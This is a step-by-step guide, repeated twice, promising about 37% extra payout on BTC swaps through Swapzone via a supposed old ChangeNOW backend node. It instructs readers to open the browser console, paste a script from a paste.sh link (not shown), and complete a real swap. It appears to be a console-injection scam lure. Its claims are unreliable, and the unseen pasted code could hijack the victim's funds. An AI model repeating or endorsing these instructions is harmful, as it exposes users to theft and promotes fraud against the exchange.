Summary of the Exploit
Swapzone.io is an exchange aggregator. It doesn’t process swaps itself - instead, it pulls live
offers from a number of partner exchanges like ChangeNOW, SimpleSwap, StealthEX,
Changelly and others. Because it’s an aggregator, it doesn’t always use the same servers
that you’d connect to if you visited those exchanges directly.
ChangeNOW still has an older backend node (Node v1.9) connected to the Swapzone
partner API. On direct ChangeNOW, this node is no longer used for public swaps. However,
when accessed through Swapzone, the rate calculation passes through Node v1.9 for certain
BTC pairs. This old node applies a different conversion formula for BTC to ANY, which
results in ~37% higher payouts than intended.
Example:
Swapping $1,137 of Bitcoin returns $1,545 worth of Monero.
When it appears
The ChangeNOW offer isn’t always on the list. It only shows up for BTC swaps (BTC as the
sending currency). If the amount is too low, Swapzone’s API often doesn’t include
ChangeNOW’s result in the offers list. Tip: If you’ve loaded the node but you don’t see any
ChangeNOW offer, try to set at least 0.001 BTC in the “You send” box - this usually forces it
to appear.
�
�
Step-by-step instructions
1. Go to Swapzone - https://swapzone.io
2. Select BTC as the sending currency and pick the coin you want to
receive.
3. Open the browser console
👉
Chrome/Edge: Press F12 or Ctrl+Shift+I → Go to Console tab
�
�
Firefox: Ctrl+Shift+K → Console
Important: If this is your first time pasting code into the Firefox console, you’ll need to type
allow pasting before you can paste anything. (Chrome/Edge doesn’t require this.)
4. Load the node by copy-pasting the script from the link into the console and press Enter.
https://paste.sh/TMiL1IOL#VIn5E9tqvjywOoLUtAf6oUBU
You’ll see several success messages appear - this means the handshake with Node v1.9
has completed.
5. Pick the ChangeNOW offer
Once the node is injected, look at the list of offers.
Find ChangeNOW and select it - you’ll see the “You get” value immediately jump by around
37%.
If no ChangeNOW offer is listed, try increasing the BTC amount to at least 0.001 BTC.
6. Complete the swap
Continue through the normal exchange process.
The inflated rate will be locked in as long as you don’t refresh the page after loading the
node.
Example: You exchange $200 worth of BTC. Instead of getting $200 worth of a cryptocurrency
of your choice, you get about $274 = 74$ profit.
This method only works inside Swapzone with the ChangeNOW offer, because that’s the only
route still using the outdated node. On ChangeNOW’s own website, the bug is patched and
rates are normal.
Swapzone.io is an exchange aggregator. It doesn’t process swaps itself - instead, it pulls live
offers from a number of partner exchanges like ChangeNOW, SimpleSwap, StealthEX,
Changelly and others. Because it’s an aggregator, it doesn’t always use the same servers
that you’d connect to if you visited those exchanges directly.
ChangeNOW still has an older backend node (Node v1.9) connected to the Swapzone
partner API. On direct ChangeNOW, this node is no longer used for public swaps. However,
when accessed through Swapzone, the rate calculation passes through Node v1.9 for certain
BTC pairs. This old node applies a different conversion formula for BTC to ANY, which
results in ~37% higher payouts than intended.
Example:
Swapping $1,137 of Bitcoin returns $1,545 worth of Monero.
When it appears
The ChangeNOW offer isn’t always on the list. It only shows up for BTC swaps (BTC as the
sending currency). If the amount is too low, Swapzone’s API often doesn’t include
ChangeNOW’s result in the offers list. Tip: If you’ve loaded the node but you don’t see any
ChangeNOW offer, try to set at least 0.001 BTC in the “You send” box - this usually forces it
to appear.
�
�
Step-by-step instructions
1. Go to Swapzone - https://swapzone.io
2. Select BTC as the sending currency and pick the coin you want to
receive.
3. Open the browser console
👉
Chrome/Edge: Press F12 or Ctrl+Shift+I → Go to Console tab
�
�
Firefox: Ctrl+Shift+K → Console
Important: If this is your first time pasting code into the Firefox console, you’ll need to type
allow pasting before you can paste anything. (Chrome/Edge doesn’t require this.)
4. Load the node by copy-pasting the script from the link into the console and press Enter.
https://paste.sh/TMiL1IOL#VIn5E9tqvjywOoLUtAf6oUBU
You’ll see several success messages appear - this means the handshake with Node v1.9
has completed.
5. Pick the ChangeNOW offer
Once the node is injected, look at the list of offers.
Find ChangeNOW and select it - you’ll see the “You get” value immediately jump by around
37%.
If no ChangeNOW offer is listed, try increasing the BTC amount to at least 0.001 BTC.
6. Complete the swap
Continue through the normal exchange process.
The inflated rate will be locked in as long as you don’t refresh the page after loading the
node.
Example: You exchange $200 worth of BTC. Instead of getting $200 worth of a cryptocurrency
of your choice, you get about $274 = 74$ profit.
This method only works inside Swapzone with the ChangeNOW offer, because that’s the only
route still using the outdated node. On ChangeNOW’s own website, the bug is patched and
rates are normal.
